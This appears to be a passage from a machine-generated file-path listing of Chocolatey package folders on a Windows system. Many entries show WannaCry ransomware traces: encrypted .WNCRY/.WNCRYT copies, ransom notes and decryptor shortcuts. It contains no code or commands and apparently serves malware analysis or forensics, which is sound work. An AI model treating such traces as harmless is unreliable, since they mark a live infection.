C:\Users\All Users\chocolatey\.chocolatey\KB2999226.1.0.20181019\*
C:\Users\All Users\chocolatey\.chocolatey\KB2999226.1.0.20181019
C:\Users\All Users\chocolatey\.chocolatey\KB2999226.1.0.20181019\~SD79CF.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3033929.1.0.5\*
C:\Users\All Users\chocolatey\.chocolatey\KB3033929.1.0.5
C:\Users\All Users\chocolatey\.chocolatey\KB3033929.1.0.5\~SD79D0.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3035131.1.0.3\*
C:\Users\All Users\chocolatey\.chocolatey\KB3035131.1.0.3
C:\Users\All Users\chocolatey\.chocolatey\KB3035131.1.0.3\~SD79D1.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3063858.1.0.0\*
C:\Users\All Users\chocolatey\.chocolatey\KB3063858.1.0.0
C:\Users\All Users\chocolatey\.chocolatey\KB3063858.1.0.0\~SD79D2.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3118401.1.0.5\*
C:\Users\All Users\chocolatey\.chocolatey\KB3118401.1.0.5
C:\Users\All Users\chocolatey\.chocolatey\KB3118401.1.0.5\~SD79D3.tmp
C:\Users\All Users\chocolatey\.chocolatey\OfficeProPlus2013.15.0.4827\*
C:\Users\All Users\chocolatey\.chocolatey\OfficeProPlus2013.15.0.4827
C:\Users\All Users\chocolatey\.chocolatey\OfficeProPlus2013.15.0.4827\~SD79E4.tmp
C:\Users\All Users\chocolatey\.chocolatey\openjdk.19.0.1\*
C:\Users\All Users\chocolatey\.chocolatey\openjdk.19.0.1
C:\Users\All Users\chocolatey\.chocolatey\openjdk.19.0.1\~SD79E5.tmp
C:\Users\All Users\chocolatey\.chocolatey\powershell-core.7.3.0-rc1\*
C:\Users\All Users\chocolatey\.chocolatey\powershell-core.7.3.0-rc1
C:\Users\All Users\chocolatey\.chocolatey\powershell-core.7.3.0-rc1\~SD79E6.tmp
C:\Users\All Users\chocolatey\.chocolatey\python3.3.8.10\*
C:\Users\All Users\chocolatey\.chocolatey\python3.3.8.10
C:\Users\All Users\chocolatey\.chocolatey\python3.3.8.10\~SD79E7.tmp
C:\Users\All Users\chocolatey\.chocolatey\tapwindows.9.24.2\*
C:\Users\All Users\chocolatey\.chocolatey\tapwindows.9.24.2
C:\Users\All Users\chocolatey\.chocolatey\tapwindows.9.24.2\~SD79E8.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist140.14.32.31332\*
C:\Users\All Users\chocolatey\.chocolatey\vcredist140.14.32.31332
C:\Users\All Users\chocolatey\.chocolatey\vcredist140.14.32.31332\~SD79E9.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist2005.8.0.50727.619501\*
C:\Users\All Users\chocolatey\.chocolatey\vcredist2005.8.0.50727.619501
C:\Users\All Users\chocolatey\.chocolatey\vcredist2005.8.0.50727.619501\~SD79EA.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist2008.9.0.30729.616104\*
C:\Users\All Users\chocolatey\.chocolatey\vcredist2008.9.0.30729.616104
C:\Users\All Users\chocolatey\.chocolatey\vcredist2008.9.0.30729.616104\~SD79EB.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist2015.14.0.24215.20170201\*
C:\Users\All Users\chocolatey\.chocolatey\vcredist2015.14.0.24215.20170201
C:\Users\All Users\chocolatey\.chocolatey\vcredist2015.14.0.24215.20170201\~SD79EC.tmp
C:\Users\All Users\chocolatey\.chocolatey\winrar.6.11.0.20220504\*
C:\Users\All Users\chocolatey\.chocolatey\winrar.6.11.0.20220504
C:\Users\All Users\chocolatey\.chocolatey\winrar.6.11.0.20220504\~SD79FC.tmp
C:\Users\All Users\chocolatey\bin\*
C:\Users\All Users\chocolatey\bin
C:\Users\All Users\chocolatey\bin\~SD79FD.tmp
C:\Users\All Users\chocolatey\bin\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\bin\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\config\*
C:\Users\All Users\chocolatey\config
C:\Users\All Users\chocolatey\config\~SD79FE.tmp
C:\Users\All Users\chocolatey\config\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\config\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\extensions\*
C:\Users\All Users\chocolatey\extensions
C:\Users\All Users\chocolatey\extensions\~SD79FF.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\*
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\~SD7A00.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\*
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\~SD7A01.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-core\*
C:\Users\All Users\chocolatey\extensions\chocolatey-core
C:\Users\All Users\chocolatey\extensions\chocolatey-core\~SD7A02.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-core\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\extensions\chocolatey-core\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\*
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\~SD7A13.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\*
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\~SD7A14.tmp
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\helpers\*
C:\Users\All Users\chocolatey\helpers
C:\Users\All Users\chocolatey\helpers\~SD7A15.tmp
C:\Users\All Users\chocolatey\helpers\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\helpers\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\helpers\functions\*
C:\Users\All Users\chocolatey\helpers\functions
C:\Users\All Users\chocolatey\helpers\functions\~SD7A16.tmp
C:\Users\All Users\chocolatey\helpers\functions\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\helpers\functions\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\lib\*
C:\Users\All Users\chocolatey\lib
C:\Users\All Users\chocolatey\lib\~SD7A65.tmp
C:\Users\All Users\chocolatey\lib\7zip\*
C:\Users\All Users\chocolatey\lib\7zip
C:\Users\All Users\chocolatey\lib\7zip\~SD7A76.tmp
C:\Users\All Users\chocolatey\lib\7zip.install\*
C:\Users\All Users\chocolatey\lib\7zip.install
C:\Users\All Users\chocolatey\lib\7zip.install\~SD7A86.tmp
C:\Users\All Users\chocolatey\lib\7zip.install\legal\*
C:\Users\All Users\chocolatey\lib\7zip.install\legal
C:\Users\All Users\chocolatey\lib\7zip.install\legal\~SD7A87.tmp
C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt
C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\tools\*
C:\Users\All Users\chocolatey\lib\7zip.install\tools
C:\Users\All Users\chocolatey\lib\7zip.install\tools\~SD7A98.tmp
C:\Users\All Users\chocolatey\lib\autohotkey.install\*
C:\Users\All Users\chocolatey\lib\autohotkey.install
C:\Users\All Users\chocolatey\lib\autohotkey.install\~SD7A99.tmp
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\*
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\~SD7AA9.tmp
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt.WNCRY
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter\*
C:\Users\All Users\chocolatey\lib\boxstarter
C:\Users\All Users\chocolatey\lib\boxstarter\~SD7ABA.tmp
C:\Users\All Users\chocolatey\lib\boxstarter\tools\*
C:\Users\All Users\chocolatey\lib\boxstarter\tools
C:\Users\All Users\chocolatey\lib\boxstarter\tools\~SD7ABB.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\*
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\~SD7ABC.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\*
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\~SD7ABD.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\*
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\~SD7ABE.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\*
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\~SD7ABF.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\*
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\~SD7AFF.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\*
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\~SD7B0F.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\*
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\~SD7B3F.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\*
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\~SD7B5F.tmp
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\*
C:\Users\All Users\chocolatey\lib\BoxStarter.Common
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\~SD7C2B.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\*
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\~SD7C9A.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\*
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\~SD7D18.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\*
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\~SD7D19.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\*
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\~SD7D97.tmp
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\*
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\~SD7DF6.tmp
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\*
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\~SD7E83.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\*
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\~SD7ED2.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\*
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\~SD7EF3.tmp
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\*
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\~SD7F71.tmp
C:\Users\All Users\chocolatey\lib\chocolatey\*
C:\Users\All Users\chocolatey\lib\chocolatey
C:\Users\All Users\chocolatey\lib\chocolatey\~SD7FA0.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\*
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\~SD7FD0.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\*
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\~SD7FF1.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\*
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\~SD805F.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\*
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\~SD80AE.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\*
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\~SD80FD.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\*
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\~SD814C.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\*
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\~SD817C.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\*
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\~SD81CB.tmp
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\*
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\~SD820B.tmp
C:\Users\All Users\chocolatey\lib\dotnet\*
C:\Users\All Users\chocolatey\lib\dotnet
C:\Users\All Users\chocolatey\lib\dotnet\~SD822B.tmp
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\*
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\~SD828A.tmp
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\*
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\~SD82AA.tmp
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\*
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\~SD82EA.tmp
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\*
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\~SD830A.tmp
C:\Users\All Users\chocolatey\lib\dotnet-runtime\*
C:\Users\All Users\chocolatey\lib\dotnet-runtime
C:\Users\All Users\chocolatey\lib\dotnet-runtime\~SD831A.tmp
C:\Users\All Users\chocolatey\lib\dotnetfx\*
C:\Users\All Users\chocolatey\lib\dotnetfx
C:\Users\All Users\chocolatey\lib\dotnetfx\~SD832B.tmp
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\*
C:\Users\All Users\chocolatey\lib\dotnetfx\tools
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\~SD832C.tmp
C:\Users\All Users\chocolatey\lib\Firefox\*
C:\Users\All Users\chocolatey\lib\Firefox
C:\Users\All Users\chocolatey\lib\Firefox\~SD833D.tmp
C:\Users\All Users\chocolatey\lib\Firefox\tools\*
C:\Users\All Users\chocolatey\lib\Firefox\tools
C:\Users\All Users\chocolatey\lib\Firefox\tools\~SD834D.tmp
C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv.WNCRY
C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv
C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv.WNCRYT
C:\Users\All Users\chocolatey\lib\GoogleChrome\*
C:\Users\All Users\chocolatey\lib\GoogleChrome
C:\Users\All Users\chocolatey\lib\GoogleChrome\~SD83AC.tmp
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\*
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\~SD83DC.tmp
C:\Users\All Users\chocolatey\lib\jre8\*
C:\Users\All Users\chocolatey\lib\jre8
C:\Users\All Users\chocolatey\lib\jre8\~SD843B.tmp
C:\Users\All Users\chocolatey\lib\jre8\tools\*
C:\Users\All Users\chocolatey\lib\jre8\tools
C:\Users\All Users\chocolatey\lib\jre8\tools\~SD847A.tmp
C:\Users\All Users\chocolatey\lib\KB2919355\*
C:\Users\All Users\chocolatey\lib\KB2919355
C:\Users\All Users\chocolatey\lib\KB2919355\~SD84E9.tmp
C:\Users\All Users\chocolatey\lib\KB2919355\tools\*
C:\Users\All Users\chocolatey\lib\KB2919355\tools
C:\Users\All Users\chocolatey\lib\KB2919355\tools\~SD8538.tmp
C:\Users\All Users\chocolatey\lib\KB2919442\*
C:\Users\All Users\chocolatey\lib\KB2919442
C:\Users\All Users\chocolatey\lib\KB2919442\~SD8539.tmp
C:\Users\All Users\chocolatey\lib\KB2919442\tools\*
C:\Users\All Users\chocolatey\lib\KB2919442\tools
C:\Users\All Users\chocolatey\lib\KB2919442\tools\~SD853A.tmp
C:\Users\All Users\chocolatey\lib\KB2999226\*
C:\Users\All Users\chocolatey\lib\KB2999226
C:\Users\All Users\chocolatey\lib\KB2999226\~SD8589.tmp
C:\Users\All Users\chocolatey\lib\KB2999226\tools\*
C:\Users\All Users\chocolatey\lib\KB2999226\tools
C:\Users\All Users\chocolatey\lib\KB2999226\tools\~SD85B9.tmp
C:\Users\All Users\chocolatey\lib\KB3033929\*
C:\Users\All Users\chocolatey\lib\KB3033929
C:\Users\All Users\chocolatey\lib\KB3033929\~SD8627.tmp
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\*
C:\Users\All Users\chocolatey\lib\KB3033929\Tools
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\~SD8686.tmp
C:\Users\All Users\chocolatey\lib\KB3035131\*
C:\Users\All Users\chocolatey\lib\KB3035131
C:\Users\All Users\chocolatey\lib\KB3035131\~SD86D5.tmp
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\*
C:\Users\All Users\chocolatey\lib\KB3035131\Tools
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\~SD86F5.tmp
C:\Users\All Users\chocolatey\lib\KB3063858\*
C:\Users\All Users\chocolatey\lib\KB3063858
C:\Users\All Users\chocolatey\lib\KB3063858\~SD8735.tmp
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\*
C:\Users\All Users\chocolatey\lib\KB3063858\Tools
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\~SD8765.tmp
C:\Users\All Users\chocolatey\lib\KB3118401\*
C:\Users\All Users\chocolatey\lib\KB3118401
C:\Users\All Users\chocolatey\lib\KB3118401\~SD87B4.tmp
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\*
C:\Users\All Users\chocolatey\lib\KB3118401\Tools
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\~SD87E4.tmp
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\*
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\~SD87E5.tmp
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\*
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\~SD87F5.tmp
C:\Users\All Users\chocolatey\lib\openjdk\*
C:\Users\All Users\chocolatey\lib\openjdk
C:\Users\All Users\chocolatey\lib\openjdk\~SD8806.tmp
C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt.WNCRY
C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt
C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\@Please_Read_Me@.txt
C:\Users\All Users\chocolatey\lib\openjdk\@WanaDecryptor@.exe.lnk
C:\Users\All Users\chocolatey\lib\openjdk\tools\*
C:\Users\All Users\chocolatey\lib\openjdk\tools
C:\Users\All Users\chocolatey\lib\openjdk\tools\~SD8884.tmp
C:\Users\All Users\chocolatey\lib\powershell-core\*
C:\Users\All Users\chocolatey\lib\powershell-core
C:\Users\All Users\chocolatey\lib\powershell-core\~SD8894.tmp
C:\Users\All Users\chocolatey\lib\powershell-core\tools\*
C:\Users\All Users\chocolatey\lib\powershell-core\tools
C:\Users\All Users\chocolatey\lib\powershell-core\tools\~SD88B5.tmp
C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt.WNCRY
C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt
C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\*
C:\Users\All Users\chocolatey\lib\python3
C:\Users\All Users\chocolatey\lib\python3\~SD8904.tmp
C:\Users\All Users\chocolatey\lib\python3\legal\*
C:\Users\All Users\chocolatey\lib\python3\legal
C:\Users\All Users\chocolatey\lib\python3\legal\~SD8914.tmp
C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt
C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\tools\*
C:\Users\All Users\chocolatey\lib\python3\tools
C:\Users\All Users\chocolatey\lib\python3\tools\~SD8944.tmp
C:\Users\All Users\chocolatey\lib\tapwindows\*
C:\Users\All Users\chocolatey\lib\tapwindows
C:\Users\All Users\chocolatey\lib\tapwindows\~SD8955.tmp
C:\Users\All Users\chocolatey\lib\tapwindows\tools\*
C:\Users\All Users\chocolatey\lib\tapwindows\tools
C:\Users\All Users\chocolatey\lib\tapwindows\tools\~SD8966.tmp
C:\Users\All Users\chocolatey\lib\vcredist140\*
C:\Users\All Users\chocolatey\lib\vcredist140
C:\Users\All Users\chocolatey\lib\vcredist140\~SD8976.tmp
C:\Users\All Users\chocolatey\lib\vcredist140\tools\*
C:\Users\All Users\chocolatey\lib\vcredist140\tools
C:\Users\All Users\chocolatey\lib\vcredist140\tools\~SD89A6.tmp
C:\Users\All Users\chocolatey\lib\vcredist2005\*
C:\Users\All Users\chocolatey\lib\vcredist2005
C:\Users\All Users\chocolatey\lib\vcredist2005\~SD89B7.tmp
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\*
C:\Users\All Users\chocolatey\lib\vcredist2005\tools
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\~SD89C7.tmp
C:\Users\All Users\chocolatey\lib\vcredist2008\*
C:\Users\All Users\chocolatey\lib\vcredist2008
C:\Users\All Users\chocolatey\lib\vcredist2008\~SD89C8.tmp
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\*
C:\Users\All Users\chocolatey\lib\vcredist2008\tools
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\~SD89E9.tmp
C:\Users\All Users\chocolatey\lib\vcredist2015\*
C:\Users\All Users\chocolatey\lib\vcredist2015
C:\Users\All Users\chocolatey\lib\vcredist2015\~SD8A28.tmp
C:\Users\All Users\chocolatey\lib\winrar\*
C:\Users\All Users\chocolatey\lib\winrar
